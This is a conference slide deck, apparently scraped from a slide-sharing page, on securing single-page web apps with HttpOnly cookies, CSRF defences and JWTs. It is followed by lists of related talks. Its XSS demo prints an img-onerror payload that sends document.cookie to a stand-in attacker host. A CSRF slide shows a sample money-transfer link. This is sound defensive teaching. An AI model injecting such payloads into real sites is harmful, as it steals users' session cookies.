Building Secure User Interfaces With JWTs (JSON Web Tokens)

Stormpath
StormpathStormpath
Building Secure User
Interfaces With JWTs
(JSON Web Tokens)
Robert Damphousse @robertjd_
Lead Front-End Developer, Stormpath
About Stormpath
• User Management API for Developers
• Password security
• Authentication and Authorization
• LDAP Cloud Sync
• Instant-on, scalable, and highly available
• Free for developers
Talk Overview
• Security Concerns for Modern Web Apps
• Cookies, The Right Way
• Session ID Problems
• Token Authentication to the rescue!
• Angular Examples
Modern Web Applications
• Single Page Apps (“SPAs”), e.g AngularJS
• Backed by a RESTful JSON API
• Run in an HTML5 Environment
• Web Browser
• WebKit instance
• “Hybrid” Mobile apps (Phonegap, etc)
Security Concerns for Modern Web Apps
Web Apps are ‘Untrusted Clients’
• Secure user credentials
• Secure server endpoints (API)
• Prevent malicious code from executing in client
• Provide Access Control rules to the Client
Securing User
Credentials
Securing User Credentials
Traditionally we accept username & password,
then store a Session ID in a cookie
Securing User Credentials: Session ID Cookie
Securing User Credentials
• This is OK if you protect your cookies
• However it may not scale well
• It doesn’t let the client know what can be
accessed
• Access Tokens are better! (We’ll get there later)
Securing API Endpoints
Securing Server (API) Endpoints
• Traditionally use Session ID Cookies
• Session ID  Session  User identity
• Use framework like Apache Shiro or Spring
Security to assert security rules
Informing the Client
about Access Control
Providing Access Control Rules to the Client
• Traditional solution:
• Let the app bootstrap
• GET a /me or /profile endpoint
• Session ID  Session  User data in your DB
• Parse response for ACL information
• Access Tokens are better!
Cookies,
The Right Way ®
Cookies, The Right Way ®
Cookies can be easily compromised
• Man-in-the-Middle (MITM) attacks
• XSS Attacks
• Cross-Site Request Forgery (CSRF)
Man In The Middle (MITM) Attacks
Someone ‘listening on the wire’ between the
browser and server can see and copy the
cookie.
Solutions
• Use HTTPS everywhere
• TLS everywhere on internal networks
Cross-Site Scripting
(XSS)
XSS Attacks
This is a very REAL problem
Happens when someone else can execute
code inside your website
Can be used to steal your cookies!
https://www.owasp.org/index.php/XSS
XSS Attack Demo
https://www.google.com/about/appsecurity/
learning/xss/#StoredXSS
XSS Attack Demo
XSS Attack Demo
XSS Attack Demo
<img src=x
onerror="document.body.appendChild(function
(){var a = document.createElement('img');
a.src='https://hackmeplz.com/yourCookies.pn
g/?cookies=’
+document.cookie;return a}())"
So what if I put this in the chatbox..
XSS Attack Demo
GET
https://hackmeplz.com/yourCookies.png/?cook
ies=SessionID=123412341234
Your browser is going to make this
request:
Which means..
Building Secure User Interfaces With JWTs (JSON Web Tokens)
XSS Attack – What Can I Do?
Escape Content
• Server-side: Use well-known, trusted libraries to
ensure dynamic HTML does not contain
executable code. Do NOT roll your own.
• Client Side: Escape user input from forms (some
frameworks do this for you, but read the docs for
caveats!)
XSS Attack – What Can I Do?
Use HTTPS-Only cookies
When sending a cookie to a client, declare it as
HTTPS-Only
It will not be available to the JavaScript
environment, sweet!
It will only be sent over secure connections, sweet!
XSS Attack – What Can I Do?
Read this definitive guide:
https://www.owasp.org/index.php/XSS
Cross-Site Request
Forgery
(CSRF)
(XSRF)
Cross-Site Request Forgery (CSRF)
Exploits the fact that HTML tags do NOT follow the
Same Origin Policy when making GET requests
https://www.owasp.org/index.php/Cross-
Site_Request_Forgery_(CSRF)
https://developer.mozilla.org/en-
US/docs/Web/Security/Same-origin_policy
Cross-Site Request Forgery (CSRF)
Example: Attacker enables a user to request your
server. Example:
<a
href=“https://myapp.com/transferMoney
?to=BadGuy&amount=10000”>See Cute
Cats!</a>
What happens?
Cross-Site Request Forgery (CSRF)
• The browser says, “The request is going to
myapp.com, so I’ll happily send along your
cookies for myapp.com!”
• Your server trusts the cookies AND the
identity reference, and transfers the money!
Cross-Site Request Forgery (CSRF)
Pro tip: never allow GET requests to modify
server state!
Cross-Site Request Forgery (CSRF)
Solutions:
• Synchronizer Token (for form-based apps)
• Double-Submit Cookie (for modern apps)
• Origin header check (for extra measure)
Double Submit Cookie
• Give client two cookies: Session ID +
Random Value, maintain pointers between
the two
• Client sends back the random value explicitly,
triggering the Same-Origin-Policy
Double Submit Cookie Workflow
Validate
Token
Double Submit Cookie Workflow
Double Submit Cookie Considerations
Still vulnerable to XSS!
• Token can be hijacked, but SOP mitigates use
in malicious browser environment
• Session cookie MUST be HTTP(S) only to
prevent true hijacking
Protect against XSS!
Double Submit Cookie Considerations
NEVER DO THIS ON YOUR HTTP
RESPONSES:
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers:*
Origin Header check
• Browsers send Origin header
• Use to know if request is originating from your
domain
• Cannot be hacked via browser JS
• CAN be modified by a malicious HTTP Proxy
(use HTTPS!)
Session Identifiers
The Server Story
Session ID Problems
• They’re opaque and have no meaning
themselves (they’re just ‘pointers’)
• Session ID  look up server state on *every
request*.
• Cannot be used for inter-op with other
services
Alas..
Token Authentication!
Token Authentication
• Q: What is Authentication?
• A: Proving who you are
• Q: What is a Token?
• A: Mechanism for persisting that proof, that
“assertion”
Hold tight.. we’re about to
go from here:
..to here
Token Authentication Workflow
Token Authentication Workflow
This looks a lot like the
Session ID workflow..
But it’s different!
That accessToken is special, in fact..
It’s a JSON Web Token

JSON Web Tokens (JWT)
In the wild they look like just another ugly string:
eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ
pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo
gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV
lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj
Xk
JSON Web Tokens (JWT)
But they do have a three part structure. Each
part is a Base64-encoded string:
eyJ0eXAiOiJKV1QiLA0KICJhb
GciOiJIUzI1NiJ9
.
eyJpc3MiOiJqb2UiLA0KICJle
HAiOjEzMDA4MTkzODAsDQogIm
h0dHA6Ly9leGFtcGxlLmNvbS9
pc19yb290Ijp0cnVlfQ
.
dBjftJeZ4CVPmB92K27uhbUJU
1p1r_wW1gFWFOEjXk
Header
Body (‘Claims’)
Cryptographic Signature
JSON Web Tokens (JWT)
Base64-decode the parts to find the juicy bits:
{
"typ":"JWT",
"alg":"HS256"
}
{
"iss”:”http://trustyapp.com/”,
"exp": 1300819380,
“sub”: ”users/8983462”,
“scope”: “self api/buy”
}
tß´—™à%O˜v+nî…SZu¯µ€U…8H×
Header
Body (‘Claims’)
Cryptographic Signature
JSON Web Tokens (JWT)
The claims body is the best part! It can tell:
{
"iss”:”http://trustyapp.com/”,
"exp": 1300819380,
“sub”: ”users/8983462”,
“scope”: “self api/buy”
}
Who issued the token
When it expires
Who it represents
What they can do
JSON Web Tokens (JWT)
• Implicitly trusted because it is
cryptographically signed
• Structured data, enabling inter-op between
services
• Can inform your client about basic access
control rules (permissions)*
• And the big one: statelessness!
*servers must always enforce access control policies
JSON Web Tokens (JWT)
Caveats
• Implicit trust is a tradeoff – how long should
the token be good for? how will you revoke it?
(Another talk: refresh tokens)
• You still have to secure your cookies!
• You have to be mindful of what you store in the
JWT if they are not encrypted. No sensitive info!
Demo!
https://github.com/stormpath/stormpath-sdk-angularjs
Angular App w/ Login Form
Login makes POST to /oauth/token
POST /oauth/token?grant_type=password
Origin: http://localhost:9000
username=robert%40stormpath.com
&password=robert%40stormpath.com
Server Response
HTTP/1.1 200 OK
set-cookie: XSRF-TOKEN=47255bff-6766-4445-
8645-55189427e13d; Expires=Wed, 13 May 2015
07:15:33 GMT;Path=/;
set-cookie:
access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI
1NiJ9.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26
rSXkg…; Expires=Wed, 13 May 2015 07:15:33
GMT; HttpOnly;Path=/;
Subsequent Requests
GET http://localhost:9000/api/things
Cookie:access_token=eyJ0eXAiOiJKV1QiLCJhbGci
OiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2FwaS5zdG9
ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8xaDcyUEZ
Xb0d4SEtoeXNLallJa2lyIiwic3ViIjoiaHR0cHM6Ly9
hcGkuc3Rvcm1wYXRoLmNvbS92MS9…
X-XSRF-TOKEN: 47255bff-6766-4445-
8645-55189427e13d
Bonus Round!
{
"iss":
"https://api.stormpath.com/v1/applications/1h72PFWoGxH
KhysKjYIkir",
"sub":
"https://api.stormpath.com/v1/accounts/25texzRz3g0vNKl
SWNGPXq",
"jti": "6b577bde-80dd-4468-904a-0c34f4bfdb17",
"iat": 1431497733,
"exp": 1431501333,
"xsrfToken”: "47255bff-6766-4445-8645-55189427e13d"
} Go Stateless!
Recap..
• Session Identifiers are problematic because
they’re opaque
• Access Tokens are better because they’re
structured and contain identity assertions
• Cookies are OK for token storage, but you
MUST secure them the right way
Use Stormpath for API Authentication & Security
In addition to user authentication and data security, Stormpath can handle
authentication and authorization for your API, SPA or mobile app.
• API Authentication
• API Key Management
• Authorization
• Token Based Authentication
• OAuth
• JWTs
http://docs.stormpath.com/guides/api-key-management/
Implementations in your Library of choice:
https://docs.stormpath.com/home/
Get started with your free Stormpath
developer account!
https://api.stormpath.com/register
Questions?
support@stormpath.com
1 of 63

Recommended

Modern API Security with JSON Web Tokens by
Modern API Security with JSON Web TokensModern API Security with JSON Web Tokens
Modern API Security with JSON Web TokensJonathan LeBlanc
3.7K views41 slides
Token Based Authentication Systems with AngularJS & NodeJS by
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSHüseyin BABAL
6.2K views15 slides
PHP Experience 2016 - [Palestra] Json Web Token (JWT) by
PHP Experience 2016 - [Palestra] Json Web Token (JWT)PHP Experience 2016 - [Palestra] Json Web Token (JWT)
PHP Experience 2016 - [Palestra] Json Web Token (JWT)iMasters
2.1K views33 slides
JSON Web Token by
JSON Web TokenJSON Web Token
JSON Web TokenDeddy Setyadi
1.5K views15 slides
2016 pycontw web api authentication by
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication Micron Technology
2K views45 slides
Micro Web Service - Slim and JWT by
Micro Web Service - Slim and JWTMicro Web Service - Slim and JWT
Micro Web Service - Slim and JWTTuyen Vuong
3.9K views15 slides

More Related Content

What's hot

Json web token api authorization by
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
15.2K views24 slides
Introduction to JWT and How to integrate with Spring Security by
Introduction to JWT and How to integrate with Spring SecurityIntroduction to JWT and How to integrate with Spring Security
Introduction to JWT and How to integrate with Spring SecurityBruno Henrique Rother
4.1K views52 slides
Securing Single Page Applications with Token Based Authentication by
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationStefan Achtsnit
4.3K views12 slides
Using JSON Web Tokens for REST Authentication by
Using JSON Web Tokens for REST Authentication Using JSON Web Tokens for REST Authentication
Using JSON Web Tokens for REST Authentication Mediacurrent
2K views43 slides
What are JSON Web Tokens and Why Should I Care? by
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?Derek Edwards
1.2K views10 slides
Json web token by
Json web tokenJson web token
Json web tokenMayank Patel
2.9K views23 slides

What's hot(20)

Json web token api authorization by Giulio De Donato
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato15.2K views
Introduction to JWT and How to integrate with Spring Security by Bruno Henrique Rother
Introduction to JWT and How to integrate with Spring SecurityIntroduction to JWT and How to integrate with Spring Security
Introduction to JWT and How to integrate with Spring Security
Securing Single Page Applications with Token Based Authentication by Stefan Achtsnit
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based Authentication
Stefan Achtsnit4.3K views
Using JSON Web Tokens for REST Authentication by Mediacurrent
Using JSON Web Tokens for REST Authentication Using JSON Web Tokens for REST Authentication
Using JSON Web Tokens for REST Authentication
Mediacurrent2K views
What are JSON Web Tokens and Why Should I Care? by Derek Edwards
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?
Derek Edwards1.2K views
Authentication: Cookies vs JWTs and why you’re doing it wrong by Derek Perkins
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins35K views
REST Service Authetication with TLS & JWTs by Jon Todd
REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd8K views
Single-Page-Application & REST security by Igor Bossenko
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko21K views
Rest Security with JAX-RS by Frank Kim
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
Frank Kim11.6K views
What the Heck is OAuth and Open ID Connect? - UberConf 2017 by Matt Raible
What the Heck is OAuth and Open ID Connect? - UberConf 2017What the Heck is OAuth and Open ID Connect? - UberConf 2017
What the Heck is OAuth and Open ID Connect? - UberConf 2017
Matt Raible879 views
Securing RESTful APIs using OAuth 2 and OpenID Connect by Jonathan LeBlanc
Securing RESTful APIs using OAuth 2 and OpenID ConnectSecuring RESTful APIs using OAuth 2 and OpenID Connect
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc49.2K views
An Introduction to OAuth2 by Aaron Parecki
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki14.7K views
Stateless authentication with OAuth 2 and JWT - JavaZone 2015 by Alvaro Sanchez-Mariscal
Stateless authentication with OAuth 2 and JWT - JavaZone 2015Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Securing Web Applications with Token Authentication by Stormpath
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath2.3K views

Similar to Building Secure User Interfaces With JWTs (JSON Web Tokens)

Building Secure User Interfaces With JWTs by
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
658 views63 slides
Browser Security 101 by
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
2.1K views48 slides
Token Authentication for Java Applications by
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
8.5K views51 slides
Spa Secure Coding Guide by
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
152 views32 slides
Open source security by
Open source securityOpen source security
Open source securitylrigknat
1.6K views24 slides
Starwest 2008 by
Starwest 2008Starwest 2008
Starwest 2008Caleb Sima
798 views40 slides

Similar to Building Secure User Interfaces With JWTs (JSON Web Tokens)(20)

Building Secure User Interfaces With JWTs by robertjd
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd658 views
Browser Security 101 by Stormpath
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath2.1K views
Token Authentication for Java Applications by Stormpath
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath8.5K views
Open source security by lrigknat
Open source securityOpen source security
Open source security
lrigknat1.6K views
Starwest 2008 by Caleb Sima
Starwest 2008Starwest 2008
Starwest 2008
Caleb Sima798 views
Going Beyond Cross Domain Boundaries (jQuery Bulgaria) by Ivo Andreev
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev3.9K views
04. xss and encoding by Eoin Keary
04.  xss and encoding04.  xss and encoding
04. xss and encoding
Eoin Keary2K views
Html5 security by Krishna T
Html5 securityHtml5 security
Html5 security
Krishna T2.6K views
Website hacking and prevention (All Tools,Topics & Technique ) by Jay Nagar
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar669 views
Top 10 Web Hacks 2012 by Matt Johansen
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
Matt Johansen29.5K views
Cross Site Scripting - Mozilla Security Learning Center by Michael Coates
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates6.1K views
W3 conf hill-html5-security-realities by Brad Hill
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill10.4K views
Top Ten Web Hacking Techniques of 2012 by Jeremiah Grossman
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
Jeremiah Grossman3.9K views
Cross Site Scripting (XSS) by OWASP Khartoum
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
OWASP Khartoum3.7K views
Devbeat Conference - Developer First Security by Michael Coates
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
Michael Coates19K views
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery by OWASP Khartoum
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum895 views
XSS (Cross Site Scripting) by Shubham Gupta
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Shubham Gupta293 views

More from Stormpath

The Ultimate Guide to Mobile API Security by
The Ultimate Guide to Mobile API SecurityThe Ultimate Guide to Mobile API Security
The Ultimate Guide to Mobile API SecurityStormpath
2.2K views17 slides
Getting Started With Angular by
Getting Started With AngularGetting Started With Angular
Getting Started With AngularStormpath
756 views42 slides
Building Beautiful REST APIs with ASP.NET Core by
Building Beautiful REST APIs with ASP.NET CoreBuilding Beautiful REST APIs with ASP.NET Core
Building Beautiful REST APIs with ASP.NET CoreStormpath
2.2K views21 slides
Build a REST API for your Mobile Apps using Node.js by
Build a REST API for your Mobile Apps using Node.jsBuild a REST API for your Mobile Apps using Node.js
Build a REST API for your Mobile Apps using Node.jsStormpath
1.3K views12 slides
REST API Security: OAuth 2.0, JWTs, and More! by
REST API Security: OAuth 2.0, JWTs, and More!REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!Stormpath
7.8K views69 slides
JWTs in Java for CSRF and Microservices by
JWTs in Java for CSRF and MicroservicesJWTs in Java for CSRF and Microservices
JWTs in Java for CSRF and MicroservicesStormpath
715 views14 slides

More from Stormpath(20)

The Ultimate Guide to Mobile API Security by Stormpath
The Ultimate Guide to Mobile API SecurityThe Ultimate Guide to Mobile API Security
The Ultimate Guide to Mobile API Security
Stormpath2.2K views
Getting Started With Angular by Stormpath
Getting Started With AngularGetting Started With Angular
Getting Started With Angular
Stormpath756 views
Building Beautiful REST APIs with ASP.NET Core by Stormpath
Building Beautiful REST APIs with ASP.NET CoreBuilding Beautiful REST APIs with ASP.NET Core
Building Beautiful REST APIs with ASP.NET Core
Stormpath2.2K views
Build a REST API for your Mobile Apps using Node.js by Stormpath
Build a REST API for your Mobile Apps using Node.jsBuild a REST API for your Mobile Apps using Node.js
Build a REST API for your Mobile Apps using Node.js
Stormpath1.3K views
REST API Security: OAuth 2.0, JWTs, and More! by Stormpath
REST API Security: OAuth 2.0, JWTs, and More!REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!
Stormpath7.8K views
JWTs in Java for CSRF and Microservices by Stormpath
JWTs in Java for CSRF and MicroservicesJWTs in Java for CSRF and Microservices
JWTs in Java for CSRF and Microservices
Stormpath715 views
Beautiful REST+JSON APIs with Ion by Stormpath
Beautiful REST+JSON APIs with IonBeautiful REST+JSON APIs with Ion
Beautiful REST+JSON APIs with Ion
Stormpath3.7K views
Storing User Files with Express, Stormpath, and Amazon S3 by Stormpath
Storing User Files with Express, Stormpath, and Amazon S3Storing User Files with Express, Stormpath, and Amazon S3
Storing User Files with Express, Stormpath, and Amazon S3
Stormpath385 views
Custom Data Search with Stormpath by Stormpath
Custom Data Search with StormpathCustom Data Search with Stormpath
Custom Data Search with Stormpath
Stormpath333 views
Building Beautiful REST APIs in ASP.NET Core by Stormpath
Building Beautiful REST APIs in ASP.NET CoreBuilding Beautiful REST APIs in ASP.NET Core
Building Beautiful REST APIs in ASP.NET Core
Stormpath1.2K views
JWTs for CSRF and Microservices by Stormpath
JWTs for CSRF and MicroservicesJWTs for CSRF and Microservices
JWTs for CSRF and Microservices
Stormpath856 views
Instant Security & Scalable User Management with Spring Boot by Stormpath
Instant Security & Scalable User Management with Spring BootInstant Security & Scalable User Management with Spring Boot
Instant Security & Scalable User Management with Spring Boot
Stormpath669 views
Token Authentication in ASP.NET Core by Stormpath
Token Authentication in ASP.NET CoreToken Authentication in ASP.NET Core
Token Authentication in ASP.NET Core
Stormpath2.1K views
Mobile Authentication for iOS Applications - Stormpath 101 by Stormpath
Mobile Authentication for iOS Applications - Stormpath 101Mobile Authentication for iOS Applications - Stormpath 101
Mobile Authentication for iOS Applications - Stormpath 101
Stormpath887 views
Spring Boot Authentication...and More! by Stormpath
Spring Boot Authentication...and More! Spring Boot Authentication...and More!
Spring Boot Authentication...and More!
Stormpath2.4K views
Multi-Tenancy with Spring Boot by Stormpath
Multi-Tenancy with Spring Boot Multi-Tenancy with Spring Boot
Multi-Tenancy with Spring Boot
Stormpath4.5K views
Secure API Services in Node with Basic Auth and OAuth2 by Stormpath
Secure API Services in Node with Basic Auth and OAuth2Secure API Services in Node with Basic Auth and OAuth2
Secure API Services in Node with Basic Auth and OAuth2
Stormpath1.9K views
Stormpath 101: Spring Boot + Spring Security by Stormpath
Stormpath 101: Spring Boot + Spring SecurityStormpath 101: Spring Boot + Spring Security
Stormpath 101: Spring Boot + Spring Security
Stormpath2.1K views
How to Use Stormpath in angular js by Stormpath
How to Use Stormpath in angular jsHow to Use Stormpath in angular js
How to Use Stormpath in angular js
Stormpath2.2K views
Rest API Security by Stormpath
Rest API SecurityRest API Security
Rest API Security
Stormpath11.7K views

Recently uploaded

DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - Afternoon by
DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - AfternoonDSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - Afternoon
DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - AfternoonDeltares
13 views43 slides
DevsRank by
DevsRankDevsRank
DevsRankdevsrank786
11 views1 slide
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra... by
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...Marc Müller
38 views62 slides
Roadmap y Novedades de producto by
Roadmap y Novedades de productoRoadmap y Novedades de producto
Roadmap y Novedades de productoNeo4j
50 views33 slides
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida by
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - PridaDSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - PridaDeltares
18 views9 slides
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ... by
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...marksimpsongw
76 views34 slides

Recently uploaded(20)

DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - Afternoon by Deltares
DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - AfternoonDSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - Afternoon
DSD-INT 2023 - Delft3D User Days - Welcome - Day 3 - Afternoon
Deltares13 views
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra... by Marc Müller
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
Marc Müller38 views
Roadmap y Novedades de producto by Neo4j
Roadmap y Novedades de productoRoadmap y Novedades de producto
Roadmap y Novedades de producto
Neo4j50 views
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida by Deltares
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - PridaDSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida
Deltares18 views
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ... by marksimpsongw
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
marksimpsongw76 views
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko... by Deltares
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
Deltares11 views
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI... by Marc Müller
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...
Dev-Cloud Conference 2023 - Continuous Deployment Showdown: Traditionelles CI...
Marc Müller36 views
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema by Deltares
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
Deltares17 views
Tridens DevOps by Tridens
Tridens DevOpsTridens DevOps
Tridens DevOps
Tridens9 views
Elevate your SAP landscape's efficiency and performance with HCL Workload Aut... by HCLSoftware
Elevate your SAP landscape's efficiency and performance with HCL Workload Aut...Elevate your SAP landscape's efficiency and performance with HCL Workload Aut...
Elevate your SAP landscape's efficiency and performance with HCL Workload Aut...
HCLSoftware6 views
DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -... by Deltares
DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...
DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...
Deltares6 views
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove... by Deltares
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
Deltares17 views
Geospatial Synergy: Amplifying Efficiency with FME & Esri ft. Peak Guest Spea... by Safe Software
Geospatial Synergy: Amplifying Efficiency with FME & Esri ft. Peak Guest Spea...Geospatial Synergy: Amplifying Efficiency with FME & Esri ft. Peak Guest Spea...
Geospatial Synergy: Amplifying Efficiency with FME & Esri ft. Peak Guest Spea...
Safe Software412 views
SUGCON ANZ Presentation V2.1 Final.pptx by Jack Spektor
SUGCON ANZ Presentation V2.1 Final.pptxSUGCON ANZ Presentation V2.1 Final.pptx
SUGCON ANZ Presentation V2.1 Final.pptx
Jack Spektor22 views
Cycleops - Automate deployments on top of bare metal.pptx by Thanassis Parathyras
Cycleops - Automate deployments on top of bare metal.pptxCycleops - Automate deployments on top of bare metal.pptx
Cycleops - Automate deployments on top of bare metal.pptx
DSD-INT 2023 Baseline studies for Strategic Coastal protection for Long Islan... by Deltares
DSD-INT 2023 Baseline studies for Strategic Coastal protection for Long Islan...DSD-INT 2023 Baseline studies for Strategic Coastal protection for Long Islan...
DSD-INT 2023 Baseline studies for Strategic Coastal protection for Long Islan...
Deltares11 views
Advanced API Mocking Techniques by Dimpy Adhikary
Advanced API Mocking TechniquesAdvanced API Mocking Techniques
Advanced API Mocking Techniques
Dimpy Adhikary19 views

Building Secure User Interfaces With JWTs (JSON Web Tokens)